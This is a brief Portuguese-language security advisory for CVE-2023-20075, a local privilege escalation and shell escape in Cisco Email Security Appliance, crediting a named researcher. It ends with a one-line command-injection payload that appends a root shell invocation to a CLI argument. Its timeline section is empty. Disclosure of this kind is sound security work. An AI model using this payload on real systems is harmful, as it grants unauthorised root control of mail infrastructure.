
Cisco Email Security Appliance: Escalação de Privilégios Local e Escape de Shell
Pesquisador de segurança: ly1g3, ly1g3[at]tuta.io
Impressão digital GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
Visão geral: Escalação de privilégio local e escape de shell
CVE: CVE-2023-20075
Cronograma:
ESA (Cisco Secure Email)
Um usuário autenticado com acesso ao cli pode escalar privilégios para root e executar código arbitrário
logcollector36;/bin/sh/data/release/phoebe-14*/bin/runas 0 /bin/sh